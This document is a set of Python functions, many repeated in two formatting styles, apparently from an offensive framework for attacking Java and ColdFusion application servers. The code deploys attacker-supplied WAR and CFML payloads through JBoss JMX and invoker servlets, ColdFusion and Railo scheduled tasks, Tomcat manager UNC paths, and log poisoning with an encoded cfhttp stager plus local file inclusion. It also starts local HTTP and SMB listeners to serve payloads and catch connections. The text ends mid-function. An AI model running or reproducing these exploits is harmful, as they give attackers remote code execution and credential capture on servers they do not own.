def invoke(url, payload, os, version, pl_file):
""" All we need to do is traverse up to the admin-ext-thumbnails
directory and invoke our stager
"""
utility.Msg("Invoking stager and deploying payload...")
fetchurl = "http://{0}:{1}/{2}".format(utility.local_address(),
state.external_port, pl_file)
# calculate file hash
hsh = md5("%s-5000-5000" % fetchurl).hexdigest().upper()
url = url.format(hsh)
# fire up server
server_thread = Thread(target=_serve, args=(payload,))
server_thread.start()
sleep(2)
r = utility.requests_get(url)
if waitServe(server_thread):
utility.Msg("{0} deployed at /railo-context/{0}".format(
parse_war_path(payload,True)),
LOG.SUCCESS)
else:
utility.Msg("Failed to deploy (HTTP %d)" % r.status_code, LOG.ERROR)
killServe()
def invoke(url, payload, os, version, pl_file):
""" All we need to do is traverse up to the admin-ext-thumbnails
directory and invoke our stager
"""
utility.Msg("Invoking stager and deploying payload...")
fetchurl = "http://{0}:{1}/{2}".format(utility.local_address(),
state.external_port, pl_file)
# calculate file hash
hsh = md5("%s-5000-5000" % fetchurl).hexdigest().upper()
url = url.format(hsh)
# fire up server
server_thread = Thread(target=_serve, args=(payload, ))
server_thread.start()
sleep(2)
r = utility.requests_get(url)
if waitServe(server_thread):
utility.Msg(
"{0} deployed at /railo-context/{0}".format(
parse_war_path(payload, True)), LOG.SUCCESS)
else:
utility.Msg("Failed to deploy (HTTP %d)" % r.status_code, LOG.ERROR)
killServe()
def create_task(ip, fingerprint, cfm_file, root):
""" Create the task
"""
url = "http://{0}:{1}/CFIDE/administrator/scheduler/scheduleedit.cfm".\
format(ip, fingerprint.port)
(cookie, csrf) = fetch_csrf(ip, fingerprint, url)
data = {
"csrftoken" : csrf,
"TaskName" : cfm_file,
"Start_Date" : "Jan 27, 2014", # shouldnt matter since we force run
"ScheduleType" : "Once",
"StartTimeOnce" : "9:56 PM", # see above
"Operation" : "HTTPRequest",
"ScheduledURL" : "http://{0}:8000/{1}".format(utility.local_address(), cfm_file),
"publish" : "1",
"publish_file" : root + "\\" + cfm_file, # slash on OS?
"adminsubmit" : "Submit"
}
if fingerprint.version in ["10.0"]:
data['publish_overwrite'] = 'on'
response = utility.requests_get(url, cookies=cookie)
if response.status_code is 200:
# create task
response = utility.requests_post(url, data=data, cookies=cookie,
headers={'Content-Type':'application/x-www-form-urlencoded'})
if response.status_code is 200:
return True
def deploy(fingerengine, fingerprint):
"""
"""
war_file = fingerengine.options.deploy
war_name = war_file.rsplit("/", 1)[1]
utility.Msg("Preparing to deploy {0}...".format(war_file))
url = "http://{0}:{1}/invoker/EJBInvokerServlet".format(
fingerengine.options.ip, fingerprint.port)
local_url = "http://{0}:8000/{1}".format(utility.local_address(), war_name)
# start the local HTTP server
server_thread = Thread(target=_serve, args=(war_file,))
server_thread.start()
# run serialization code
response = invkdeploy(versions[1], url, local_url)
if response is not None:
utility.Msg(response, LOG.DEBUG)
if waitServe(server_thread):
utility.Msg("{0} deployed to {1}".format(war_file,
fingerengine.options.ip), LOG.SUCCESS)
else:
utility.Msg("EJBInvokerServlet not vulnerable", LOG.ERROR)
try:
get("http://localhost:8000/", timeout=1.0)
except:
pass
def deploy(fingerengine, fingerprint):
"""
"""
war_file = fingerengine.options.deploy
war_name = war_file.rsplit("/", 1)[1]
utility.Msg("Preparing to deploy {0}...".format(war_file))
url = "http://{0}:{1}/invoker/JMXInvokerServlet".format(
fingerengine.options.ip, fingerprint.port)
local_url = "http://{0}:8000/{1}".format(utility.local_address(), war_name)
# start the local HTTP server
server_thread = Thread(target=_serve, args=(war_file, ))
server_thread.start()
# run serialization code
response = invkdeploy(versions[1], url, local_url)
if response is not None:
utility.Msg(response, LOG.DEBUG)
if waitServe(server_thread):
utility.Msg(
"{0} deployed to {1}".format(war_file, fingerengine.options.ip),
LOG.SUCCESS)
else:
utility.Msg("JMXInvokerServlet not vulnerable", LOG.ERROR)
try:
get("http://localhost:8000/", timeout=1.0)
except:
pass
def run(self, fingerengine, fingerprint):
""" Same concept as the JBoss module, except we actually invoke the
deploy function.
"""
if getuid() > 0:
utility.Msg("Root privs required for this module.", LOG.ERROR)
return
utility.Msg("Setting up SMB listener...")
self._Listen = True
thread = Thread(target=self.smb_listener)
thread.start()
utility.Msg("Invoking UNC deployer...")
base = 'http://{0}:{1}'.format(fingerengine.options.ip,
fingerprint.port)
if fingerprint.version in ["5.5"]:
uri = '/manager/html/deploy?deployPath=/asdf&deployConfig=&'\
'deployWar=file://{0}/asdf.war'.format(utility.local_address())
elif fingerprint.version in ["6.0", "7.0", "8.0"]:
return self.runLatter(fingerengine, fingerprint, thread)
else:
utility.Msg("Unsupported Tomcat (v%s)" % fingerprint.version,
LOG.ERROR)
return
url = base + uri
response = utility.requests_get(url)
if response.status_code == 401:
utility.Msg(
"Host %s:%s requires auth, checking..." %
(fingerengine.options.ip, fingerprint.port), LOG.DEBUG)
cookies = checkAuth(fingerengine.options.ip, fingerprint.port,
fingerprint.title, fingerprint.version)
if cookies:
response = utility.requests_get(url,
cookies=cookies[0],
auth=cookies[1])
else:
utility.Msg(
"Could not get auth for %s:%s" %
(fingerengine.options.ip, fingerprint.port), LOG.ERROR)
return
while thread.is_alive():
# spin...
sleep(1)
if response.status_code != 200:
utility.Msg("Unexpected response: HTTP %d" % response.status_code)
self._Listen = False
def runLatter(self, fingerengine, fingerprint, smb_thread):
"""
"""
base = "http://{0}:{1}".format(fingerengine.options.ip,
fingerprint.port)
uri = "/manager/html/deploy"
data = OrderedDict([
("deployPath", "/asdf"),
("deployConfig", ""),
("deployWar",
"file://{0}/asdf.war".format(utility.local_address())),
])
cookies = None
nonce = None
# probe for auth
response = utility.requests_get(base + '/manager/html')
if response.status_code == 401:
utility.Msg(
"Host %s:%s requires auth, checking.." %
(fingerengine.options.ip, fingerprint.port), LOG.DEBUG)
cookies = checkAuth(fingerengine.options.ip, fingerprint.port,
fingerprint.title, fingerprint.version)
if cookies:
response = utility.requests_get(base + '/manager/html',
cookies=cookies[0],
auth=cookies[1])
# get nonce
nonce = findall("CSRF_NONCE=(.*?)\"", response.content)
if len(nonce) > 0:
nonce = nonce[0]
# set new jsessionid
cookies = (dict_from_cookiejar(response.cookies), cookies[1])
else:
utility.Msg(
"Could not get auth for %s:%s" %
(fingerengine.options.ip, fingerprint.port), LOG.DEBUG)
return
if response.status_code == 200:
try:
# all setup, now invoke
response = utility.requests_post(base + uri + \
'?org.apache.catalina.filters.CSRF_NONCE=%s' % nonce,
data = data, cookies=cookies[0],
auth=cookies[1])
except:
# timeout
pass
while smb_thread.is_alive():
# spin...
sleep(1)
def run(self, fingerengine, fingerprint):
""" Same as JBoss/Tomcat
"""
if not utility.check_admin():
utility.Msg("Root privs required for this module.", LOG.ERROR)
return
base = 'http://{0}:{1}'.format(fingerengine.options.ip,
fingerprint.port)
uri = '/console/console.portal?AppApplicationInstallPortlet_actionOverride'\
'=/com/bea/console/actions/app/install/appSelected'
data = {
"AppApplicationInstallPortletselectedAppPath":
"\\\\{0}\\fdas.war".format(utility.local_address()),
"AppApplicationInstallPortletfrsc":
None
}
if fingerprint.title is WINTERFACES.WLS:
base = base.replace("http", "https")
utility.Msg(
"Host %s:%s requires auth, checking.." %
(fingerengine.options.ip, fingerprint.port), LOG.DEBUG)
cookies = checkAuth(fingerengine.options.ip, fingerprint)
if cookies[0]:
utility.Msg("Setting up SMB listener...")
self._Listen = True
thread = Thread(target=self.smb_listener)
thread.start()
# fetch our CSRF
data['AppApplicationInstallPortletfrsc'] = self.fetchCSRF(
base, cookies[0])
utility.Msg("Invoking UNC loader...")
try:
_ = utility.requests_post(base + uri,
data=data,
cookies=cookies[0],
timeout=1.0)
except:
# we dont care about the response here
pass
else:
utility.Msg(
"Could not get auth for %s:%s" %
(fingerengine.options.ip, fingerprint.port), LOG.ERROR)
return
while thread.is_alive():
# spin
sleep(1)
self._Listen = False
def create_task(ip, fingerprint, cfm_file, root):
"""
"""
global cookie
base = "http://{0}:{1}/railo-context/admin/web.cfm".format(
ip, fingerprint.port)
params = "?action=services.schedule&action2=create"
data = OrderedDict([
("name", cfm_file),
("url", "http://{0}:{1}/{2}".format(utility.local_address(),
state.external_port, cfm_file)),
("interval", "once"), ("start_day", "01"), ("start_month", "01"),
("start_year", "2020"), ("start_hour", "00"), ("start_minute", "00"),
("start_second", "00"), ("run", "create")
])
response = utility.requests_post(base + params, data=data, cookies=cookie)
if not response.status_code is 200 and cfm_file not in response.content:
return False
# pull the CSRF for our newly minted task
csrf = findall("task=(.*?)\"", response.content)
if len(data) > 0:
csrf = csrf[0]
else:
utility.Msg(
"Could not pull CSRF token of new task (failed to create?)",
LOG.DEBUG)
return False
# proceed to edit the task; railo loses its mind if every var isnt here
params = "?action=services.schedule&action2=edit&task=" + csrf
data["port"] = state.external_port
data["timeout"] = 50
data["run"] = "update"
data["publish"] = "yes"
data["file"] = root + '\\' + cfm_file
data["_interval"] = "once"
data["username"] = ""
data["password"] = ""
data["proxyport"] = ""
data["proxyserver"] = ""
data["proxyuser"] = ""
data["proxypassword"] = ""
data["end_hour"] = ""
data["end_minute"] = ""
data["end_second"] = ""
data["end_day"] = ""
data["end_month"] = ""
data["end_year"] = ""
response = utility.requests_post(base + params, data=data, cookies=cookie)
if response.status_code is 200 and cfm_file in response.content:
return True
return False
def runLatter(self, fingerengine, fingerprint, smb_thread):
"""
"""
base = "http://{0}:{1}".format(fingerengine.options.ip, fingerprint.port)
uri = "/manager/html/deploy"
data = OrderedDict([
("deployPath", "/asdf"),
("deployConfig", ""),
("deployWar", "file://{0}/asdf.war".format(utility.local_address())),
])
cookies = None
nonce = None
# probe for auth
response = utility.requests_get(base + '/manager/html')
if response.status_code == 401:
utility.Msg("Host %s:%s requires auth, checking.." %
(fingerengine.options.ip, fingerprint.port), LOG.DEBUG)
cookies = checkAuth(fingerengine.options.ip, fingerprint.port,
fingerprint.title, fingerprint.version)
if cookies:
response = utility.requests_get(base + '/manager/html',
cookies=cookies[0],
auth=cookies[1])
# get nonce
nonce = findall("CSRF_NONCE=(.*?)\"", response.content)
if len(nonce) > 0:
nonce = nonce[0]
# set new jsessionid
cookies = (dict_from_cookiejar(response.cookies), cookies[1])
else:
utility.Msg("Could not get auth for %s:%s" %
(fingerengine.options.ip, fingerprint.port), LOG.DEBUG)
return
if response.status_code == 200:
try:
# all setup, now invoke
response = utility.requests_post(base + uri + \
'?org.apache.catalina.filters.CSRF_NONCE=%s' % nonce,
data = data, cookies=cookies[0],
auth=cookies[1])
except:
# timeout
pass
while smb_thread.is_alive():
# spin...
sleep(1)
def run(self, fingerengine, fingerprint):
""" Same concept as the JBoss module, except we actually invoke the
deploy function.
"""
if getuid() > 0:
utility.Msg("Root privs required for this module.", LOG.ERROR)
return
utility.Msg("Setting up SMB listener...")
self._Listen = True
thread = Thread(target=self.smb_listener)
thread.start()
utility.Msg("Invoking UNC deployer...")
base = 'http://{0}:{1}'.format(fingerengine.options.ip, fingerprint.port)
if fingerprint.version in ["5.5"]:
uri = '/manager/html/deploy?deployPath=/asdf&deployConfig=&'\
'deployWar=file://{0}/asdf.war'.format(utility.local_address())
elif fingerprint.version in ["6.0", "7.0", "8.0"]:
return self.runLatter(fingerengine, fingerprint, thread)
else:
utility.Msg("Unsupported Tomcat (v%s)" % fingerprint.version, LOG.ERROR)
return
url = base + uri
response = utility.requests_get(url)
if response.status_code == 401:
utility.Msg("Host %s:%s requires auth, checking..." %
(fingerengine.options.ip, fingerprint.port), LOG.DEBUG)
cookies = checkAuth(fingerengine.options.ip, fingerprint.port,
fingerprint.title, fingerprint.version)
if cookies:
response = utility.requests_get(url, cookies=cookies[0],
auth=cookies[1])
else:
utility.Msg("Could not get auth for %s:%s" %
(fingerengine.options.ip, fingerprint.port), LOG.ERROR)
return
while thread.is_alive():
# spin...
sleep(1)
if response.status_code != 200:
utility.Msg("Unexpected response: HTTP %d" % response.status_code)
self._Listen = False
def getData(self, version):
""" For some reason 5.x+ double encodes characters
Haven't figured this out yet for 7.x
"""
if version in ["5.0", "5.1", "6.0", "6.1"]:
return OrderedDict([
('action', 'invokeOp'),
('name', 'jboss%3Atype%3DService%2Cname%3DSystemProperties'),
('methodIndex', 21),
('arg0', "\\\\{0}\\asdf".format(utility.local_address()))
])
elif version in ["3.2", "4.0", "4.2"]:
return OrderedDict([
('action', 'invokeOp'),
('name', 'jboss:type=Service,name=SystemProperties'),
('methodIndex', 21),
('arg0', "\\\\{0}\\asdf".format(utility.local_address()))
])
def getData(self, version):
""" For some reason 5.x+ double encodes characters
Haven't figured this out yet for 7.x
"""
if version in ["5.0", "5.1", "6.0", "6.1"]:
return OrderedDict([
('action', 'invokeOp'),
('name', 'jboss%3Atype%3DService%2Cname%3DSystemProperties'),
('methodIndex', 21),
('arg0', "\\\\{0}\\asdf".format(utility.local_address()))
])
elif version in ["3.2", "4.0", "4.2"]:
return OrderedDict([
('action', 'invokeOp'),
('name', 'jboss:type=Service,name=SystemProperties'),
('methodIndex', 21),
('arg0', "\\\\{0}\\asdf".format(utility.local_address()))
])
def create_task(ip, fingerprint, cfm_file, root):
""" Create the task
"""
url = "http://{0}:{1}/CFIDE/administrator/scheduler/scheduleedit.cfm".\
format(ip, fingerprint.port)
(cookie, csrf) = fetch_csrf(ip, fingerprint, url)
data = {
"TaskName":
cfm_file,
"Start_Date":
"Jan 27, 2014", # shouldnt matter since we force run
"ScheduleType":
"Once",
"StartTimeOnce":
"9:56 PM", # see above
"Operation":
"HTTPRequest",
"ScheduledURL":
"http://{0}:{1}/{2}".format(state.external_port,
utility.local_address(), cfm_file),
"publish":
"1",
"publish_file":
root + "\\" + cfm_file, # slash on OS?
"adminsubmit":
"Submit"
}
# version-specific settings
if fingerprint.version in ["9.0", "10.0", '11.0']:
data['csrftoken'] = csrf
if fingerprint.version in ["10.0", '11.0']:
data['publish_overwrite'] = 'on'
if fingerprint.version in ["7.0", "8.0"]:
data['taskNameOrig'] = ""
response = utility.requests_get(url, cookies=cookie)
if response.status_code is 200:
# create task
response = utility.requests_post(
url,
data=data,
cookies=cookie,
headers={'Content-Type': 'application/x-www-form-urlencoded'})
if response.status_code is 200:
return True
else:
utility.Msg("Failed to deploy (HTTP %d)" % response.status_code,
LOG.ERROR)
def load_file(url, payload_file, os, version):
""" Make a copy of our test PNG file, embed the stager into it,
change the extension, and stash it on the server
"""
pl_file = "msh%d.cfm" % randint(0, 500)
fetchurl = "http://{0}:{1}/{2}".format(utility.local_address(),
state.external_port, payload_file)
b64 = b64encode(fetchurl)
stager = "<cfhttp method='get' url='#ToString(ToBinary('{0}'))#'"\
" path='#GetDirectoryFromPath(GetCurrentTemplatePath())#..\..\context\'"\
" file='{1}'>".format(b64, payload_file)
# set our stager
system("cp ./src/lib/railo/header.png {0}/{1}".format(
state.serve_dir, pl_file))
with open("{0}/{1}".format(state.serve_dir, pl_file), "ab") as f:
f.write(stager + '\x00')
# fire up server
server_thread = Thread(target=_serve,
args=("%s/%s" % (state.serve_dir, pl_file), ))
server_thread.start()
sleep(2)
# invoke
_ = utility.requests_get(
url.format('http://{0}:{1}/{2}'.format(utility.local_address(),
state.external_port, pl_file)))
if waitServe(server_thread):
utility.Msg(
"%s stashed on remote host, preparing to invoke..." % pl_file,
LOG.DEBUG)
else:
utility.Msg("Failed to invoke server call", LOG.ERROR)
pl_file = None
killServe()
return pl_file
def run(self, fingerengine, fingerprint):
""" Same as JBoss/Tomcat
"""
if getuid() > 0:
utility.Msg("Root privs required for this module.", LOG.ERROR)
return
base = 'http://{0}:{1}'.format(fingerengine.options.ip, fingerprint.port)
uri = '/console/console.portal?AppApplicationInstallPortlet_actionOverride'\
'=/com/bea/console/actions/app/install/appSelected'
data = { "AppApplicationInstallPortletselectedAppPath" :
"\\\\{0}\\fdas.war".format(utility.local_address()),
"AppApplicationInstallPortletfrsc" : None
}
if fingerprint.title is WINTERFACES.WLS:
base = base.replace("http", "https")
utility.Msg("Host %s:%s requires auth, checking.." %
(fingerengine.options.ip, fingerprint.port), LOG.DEBUG)
cookies = checkAuth(fingerengine.options.ip, fingerprint)
if cookies[0]:
utility.Msg("Setting up SMB listener...")
self._Listen = True
thread = Thread(target=self.smb_listener)
thread.start()
# fetch our CSRF
data['AppApplicationInstallPortletfrsc'] = self.fetchCSRF(base, cookies[0])
utility.Msg("Invoking UNC loader...")
try:
_ = utility.requests_post(base+uri, data=data, cookies=cookies[0],
timeout=1.0)
except:
# we dont care about the response here
pass
else:
utility.Msg("Could not get auth for %s:%s" %
(fingerengine.options.ip, fingerprint.port), LOG.ERROR)
return
while thread.is_alive():
# spin
sleep(1)
self._Listen = False
def load_file(url, payload_file, os, version):
""" Make a copy of our test PNG file, embed the stager into it,
change the extension, and stash it on the server
"""
pl_file = "msh%d.cfm" % randint(0, 500)
fetchurl = "http://{0}:{1}/{2}".format(utility.local_address(),
state.external_port, payload_file)
b64 = b64encode(fetchurl)
stager = "<cfhttp method='get' url='#ToString(ToBinary('{0}'))#'"\
" path='#GetDirectoryFromPath(GetCurrentTemplatePath())#..\..\context\'"\
" file='{1}'>".format(b64, payload_file)
# set our stager
copyfile("./src/lib/railo/header.png", "{0}/{1}".format(state.serve_dir, pl_file))
with open("{0}/{1}".format(state.serve_dir, pl_file), "ab") as f:
f.write(stager + '\x00')
# fire up server
server_thread = Thread(target=_serve, args=("%s/%s" % (state.serve_dir, pl_file),))
server_thread.start()
sleep(2)
# invoke
_ = utility.requests_get(url.format('http://{0}:{1}/{2}'.format(
utility.local_address(), state.external_port,
pl_file)))
if waitServe(server_thread):
utility.Msg("%s stashed on remote host, preparing to invoke..." % pl_file, LOG.DEBUG)
else:
utility.Msg("Failed to invoke server call", LOG.ERROR)
pl_file = None
killServe()
return pl_file
def run(self, fingerengine, fingerprint):
""" Create a search collection via a nonexistent
datasource
"""
if getuid() > 0:
utility.Msg("Root privs required for this module.", LOG.ERROR)
return
utility.Msg("Setting up SMB listener...")
self._Listen = True
thread = Thread(target=self.smb_listener)
thread.start()
utility.Msg("Invoking UNC deployer...")
base = 'http://{0}:{1}'.format(fingerengine.options.ip,
fingerprint.port)
uri = "/railo-context/admin/web.cfm?action=services.search"
data = {
"collName": "asdf",
"collPath": "\\\\{0}\\asdf".format(utility.local_address()),
"collLanguage": "english",
"run": "create"
}
url = base + uri
cookies = checkAuth(fingerengine.options.ip, fingerprint.port,
fingerprint.title)
if not cookies:
utility.Msg(
"Could not get auth for %s:%s" %
(fingerengine.options.ip, fingerprint.port), LOG.ERROR)
self._Listen = False
return
response = utility.requests_post(url, data=data, cookies=cookies)
while thread.is_alive():
# spin...
sleep(1)
if response.status_code != 200:
utility.Msg("Unexpected response: HTTP %d" % response.status_code)
self._Listen = False
def deploy(fingerengine, fingerprint):
"""
"""
war_file = abspath(fingerengine.options.deploy)
war_name = parse_war_path(war_file, True)
# start the local HTTP server
server_thread = Thread(target=_serve, args=(war_file, ))
server_thread.start()
sleep(1.5)
utility.Msg("Preparing to deploy {0}...".format(war_file))
url = "http://{0}:{1}/web-console/Invoker".format(fingerengine.options.ip,
fingerprint.port)
local_url = "http://{0}:{1}/{2}".format(utility.local_address(),
state.external_port, war_name)
# poll the URL to check for a 401
response = utility.requests_get(url)
if response.status_code == 401:
utility.Msg("Host %s:%s requires auth for web-console, checking..",
LOG.DEBUG)
cookies = checkAuth(fingerengine.options.ip, fingerprint.port,
fingerprint.title, fingerprint.version)
if cookies:
(usr, pswd) = (cookies[1].username, cookies[1].password)
response = wc_invoke(url, local_url, usr, pswd)
else:
utility.Msg(
"Could not get auth for %s:%s" %
(fingerengine.options.ip, fingerprint.port), LOG.ERROR)
else:
# run our java lib for serializing the request
response = wc_invoke(url, local_url)
if not response == '':
utility.Msg(response, LOG.DEBUG)
if waitServe(server_thread):
utility.Msg(
"{0} deployed to {1}".format(war_file, fingerengine.options.ip),
LOG.SUCCESS)
killServe()
def deploy(fingerengine, fingerprint):
"""
"""
war_file = abspath(fingerengine.options.deploy)
war_name = war_file.rsplit('/', 1)[1]
# start the local HTTP server
server_thread = Thread(target=_serve, args=(war_file,))
server_thread.start()
sleep(1.5)
utility.Msg("Preparing to deploy {0}...".format(war_file))
url = "http://{0}:{1}/web-console/Invoker".format(
fingerengine.options.ip, fingerprint.port)
local_url = "http://{0}:{1}/{2}".format(utility.local_address(),
state.external_port,war_name)
# poll the URL to check for a 401
response = utility.requests_get(url)
if response.status_code == 401:
utility.Msg("Host %s:%s requires auth for web-console, checking..",
LOG.DEBUG)
cookies = checkAuth(fingerengine.options.ip, fingerprint.port,
fingerprint.title, fingerprint.version)
if cookies:
(usr, pswd) = (cookies[1].username, cookies[1].password)
response = wc_invoke(url, local_url, usr, pswd)
else:
utility.Msg("Could not get auth for %s:%s" %
(fingerengine.options.ip, fingerprint.port), LOG.ERROR)
else:
# run our java lib for serializing the request
response = wc_invoke(url, local_url)
if not response == '':
utility.Msg(response, LOG.DEBUG)
if waitServe(server_thread):
utility.Msg("{0} deployed to {1}".format(war_file,
fingerengine.options.ip),
LOG.SUCCESS)
killServe()
def run(self, fingerengine, fingerprint):
""" Create a search collection via a nonexistent
datasource
"""
if getuid() > 0:
utility.Msg("Root privs required for this module.", LOG.ERROR)
return
utility.Msg("Setting up SMB listener...")
self._Listen = True
thread = Thread(target=self.smb_listener)
thread.start()
utility.Msg("Invoking UNC deployer...")
base = 'http://{0}:{1}'.format(fingerengine.options.ip, fingerprint.port)
uri = "/railo-context/admin/web.cfm?action=services.search"
data = { "collName" : "asdf",
"collPath" : "\\\\{0}\\asdf".format(utility.local_address()),
"collLanguage" : "english",
"run" : "create"
}
url = base + uri
cookies = checkAuth(fingerengine.options.ip, fingerprint.port,
fingerprint.title)
if not cookies:
utility.Msg("Could not get auth for %s:%s" % (fingerengine.options.ip,
fingerprint.port),
LOG.ERROR)
self._Listen = False
return
response = utility.requests_post(url, data=data, cookies=cookies)
while thread.is_alive():
# spin...
sleep(1)
if response.status_code != 200:
utility.Msg("Unexpected response: HTTP %d" % response.status_code)
self._Listen = False
def deploy(fingerengine, fingerprint):
""" Exploits log poisoning to inject CFML stager code that pulls
down our payload and stashes it in web root
"""
cfm_path = abspath(fingerengine.options.deploy)
cfm_file = parse_war_path(cfm_path, True)
dip = fingerengine.options.ip
base = 'http://{0}:{1}/'.format(dip, fingerprint.port)
stager = "<cfhttp method='get' url='#ToString(ToBinary('{0}'))#'"\
" path='#ExpandPath(ToString(ToBinary('Li4vLi4v')))#'"\
" file='{1}'>"
# ensure we're deploying a valid filetype
extension = cfm_file.rsplit('.', 1)[1]
if extension.lower() not in ['jsp', 'cfml']:
utility.Msg("This deployer requires a JSP/CFML payload", LOG.ERROR)
return
# start up our local server to catch the request
server_thread = Thread(target=_serve, args=(cfm_path, ))
server_thread.start()
# inject stager
utility.Msg("Injecting stager...")
b64addr = b64encode('http://{0}:{1}/{2}'.format(utility.local_address(),
state.external_port,
cfm_file))
stager = quote_plus(stager.format(b64addr, cfm_file))
stager += ".cfml" # trigger the error for log injection
_ = utility.requests_get(base + stager)
# stager injected, now load the log file via LFI
if fingerprint.version in ["9.0", "10.0"]:
LinvokeLFI(base, fingerengine, fingerprint)
else:
invokeLFI(base, fingerengine, fingerprint)
if waitServe(server_thread):
utility.Msg("{0} deployed at /{0}".format(cfm_file), LOG.SUCCESS)
else:
utility.Msg("Failed to deploy file.", LOG.ERROR)
killServe()
def deploy(fingerengine, fingerprint):
""" Exploits log poisoning to inject CFML stager code that pulls
down our payload and stashes it in web root
"""
cfm_path = abspath(fingerengine.options.deploy)
cfm_file = parse_war_path(cfm_path, True)
dip = fingerengine.options.ip
base = 'http://{0}:{1}/'.format(dip, fingerprint.port)
stager = "<cfhttp method='get' url='#ToString(ToBinary('{0}'))#'"\
" path='#ExpandPath(ToString(ToBinary('Li4vLi4v')))#'"\
" file='{1}'>"
# ensure we're deploying a valid filetype
extension = cfm_file.rsplit('.', 1)[1]
if extension.lower() not in ['jsp', 'cfml']:
utility.Msg("This deployer requires a JSP/CFML payload", LOG.ERROR)
return
# start up our local server to catch the request
server_thread = Thread(target=_serve, args=(cfm_path,))
server_thread.start()
# inject stager
utility.Msg("Injecting stager...")
b64addr = b64encode('http://{0}:{1}/{2}'.format(utility.local_address(),
state.external_port,cfm_file))
stager = quote_plus(stager.format(b64addr, cfm_file))
stager += ".cfml" # trigger the error for log injection
_ = utility.requests_get(base + stager)
# stager injected, now load the log file via LFI
if fingerprint.version in ["9.0", "10.0"]:
LinvokeLFI(base, fingerengine, fingerprint)
else:
invokeLFI(base, fingerengine, fingerprint)
if waitServe(server_thread):
utility.Msg("{0} deployed at /{0}".format(cfm_file), LOG.SUCCESS)
else:
utility.Msg("Failed to deploy file.", LOG.ERROR)
killServe()
def create_task(ip, fingerprint, cfm_file, root):
""" Create the task
"""
url = "http://{0}:{1}/CFIDE/administrator/scheduler/scheduleedit.cfm".\
format(ip, fingerprint.port)
(cookie, csrf) = fetch_csrf(ip, fingerprint, url)
data = {
"TaskName" : cfm_file,
"Start_Date" : "Jan 27, 2014", # shouldnt matter since we force run
"ScheduleType" : "Once",
"StartTimeOnce" : "9:56 PM", # see above
"Operation" : "HTTPRequest",
"ScheduledURL" : "http://{0}:{1}/{2}".format(
utility.local_address(), state.external_port, cfm_file),
"publish" : "1",
"publish_file" : root + "\\" + cfm_file, # slash on OS?
"adminsubmit" : "Submit"
}
# version-specific settings
if fingerprint.version in ["9.0", "10.0", '11.0']:
data['csrftoken'] = csrf
if fingerprint.version in ["10.0", '11.0']:
data['publish_overwrite'] = 'on'
if fingerprint.version in ["7.0", "8.0"]:
data['taskNameOrig'] = ""
response = utility.requests_get(url, cookies=cookie)
if response.status_code is 200:
# create task
response = utility.requests_post(url, data=data, cookies=cookie,
headers={'Content-Type':'application/x-www-form-urlencoded'})
if response.status_code is 200:
return True
else:
utility.Msg("Failed to deploy (HTTP %d)" % response.status_code, LOG.ERROR);
def deploy(fingerengine, fingerprint):
"""
"""
war_file = abspath(fingerengine.options.deploy)
war_name = war_file.rsplit('/', 1)[1]
# start up the local HTTP server
server_thread = Thread(target=_serve, args=(war_file,))
server_thread.start()
sleep(2)
# major versions of JBoss have different method indices
methodIndex = {"3.0" : 21,
"3.2" : 22,
"4.0" : 3,
"4.2" : 3,
"6.0" : 19,
"6.1" : 19
}
if fingerprint.version == "3.0":
tmp = utility.capture_input("Version 3.0 has a strict WAR XML structure. "
"Ensure your WAR is compatible with 3.0 [Y/n]")
if 'n' in tmp.lower():
return
utility.Msg("Preparing to deploy {0}..".format(war_file))
url = 'http://{0}:{1}/jmx-console/HtmlAdaptor'.format(
fingerengine.options.ip, fingerprint.port)
data = OrderedDict([
('action', 'invokeOp'),
('name', 'jboss.system:service=MainDeployer'),
('methodIndex', methodIndex[fingerprint.version]),
('arg0', 'http://{0}:8000/{1}'.format(
utility.local_address(), war_name))
])
response = utility.requests_post(url, data=data)
if response.status_code == 401:
utility.Msg("Host %s:%s requires auth for JMX, checking..." %
(fingerengine.options.ip, fingerprint.port), LOG.DEBUG)
cookies = checkAuth(fingerengine.options.ip, fingerprint.port,
fingerprint.title, fingerprint.version)
if cookies:
try:
response = utility.requests_post(url, data=data,
cookies=cookies[0], auth=cookies[1])
except exceptions.Timeout:
# we should be fine here, so long as we get the POST request off.
# Just means that we haven't gotten a response quite yet.
response.status_code = 200
else:
utility.Msg("Could not get auth for %s:%s" %
(fingerengine.options.ip, fingerprint.port), LOG.ERROR)
return
if response.status_code == 200:
if waitServe(server_thread):
utility.Msg("{0} deployed to {1}".format(war_file,
fingerengine.options.ip),
LOG.SUCCESS)
else:
utility.Msg("Failed to call {0} (HTTP {1})".format
(fingerengine.options.ip, response.status_code),
LOG.ERROR)
# kill our local HTTP server
try:
get("http://localhost:8000/", timeout=1.0)
except:
pass
def create_task(ip, fingerprint, cfm_file, root, cookie):
""" Generate a new task; all parameters are necessary, unfortunately
"""
base = "http://{0}:{1}".format(ip, fingerprint.port)
uri = '/CFIDE/administrator/scheduler/scheduleedit.cfm'
if fingerprint.version in ['5.0']:
data = {
"taskNameOrig" : "",
"TaskName" : cfm_file,
"StartDate" : "01/01/2020",
"EndDate" : "",
"ScheduleType" : "Once",
"StartTimeOnce" : "13:24:05",
"Interval" : "Daily",
"StartTimeDWM" : "",
"customInterval" : "0",
"CustomStartTime" : "",
"CustomEndTime" : "",
"Operation" : "HTTPRequest",
"Port" : state.external_port,
"ScheduledURL" : "http://{0}/{1}".format(utility.local_address(), cfm_file),
"Username" : "",
"Password" : "",
"RequestTimeout" : "10",
"ProxyServer" : "",
"HttpProxyPort" : "23",
"Publish" : "1",
"filePath" : root,
"File" : cfm_file.replace('cfml', 'cfm'),
"adminsubmit" : "Submit+Changes"
}
else:
data = {
"TaskName" : cfm_file,
"Start_Date" : "Jan 2, 2020",
"End_Date" : "",
"ScheduleType" : "Once",
"StartTimeOnce" : "13:24:50",
"Interval" : "Daily",
"StartTimeDWM" : "",
"customInterval_hour" : "0",
"customInterval_min" : "0",
"customInterval_sec" : "0",
"CustomStartTime" : "",
"CustomEndTime" : "",
"Operation" : "HTTPRequest",
"ScheduledURL" : "http://{0}:{1}/{2}".format(utility.local_address(),
state.external_port, cfm_file),
"Username" : "",
"Password" : "",
"Request_Time_out" : "",
"proxy_server" : "",
"http_proxy_port" : "",
"publish" : "1",
"publish_file" : root + "\\" + cfm_file,
"adminsubmit" : "Submit",
"taskNameOrig" : ""
}
response = utility.requests_post(base+uri, data=data, cookies=cookie)
if response.status_code is 200:
return True
def create_task(ip, fingerprint, cfm_file, root):
"""
"""
global cookie
base = "http://{0}:{1}/railo-context/admin/web.cfm".format(ip, fingerprint.port)
params = "?action=services.schedule&action2=create"
data = OrderedDict([
("name", cfm_file),
("url", "http://{0}:{1}/{2}".format(
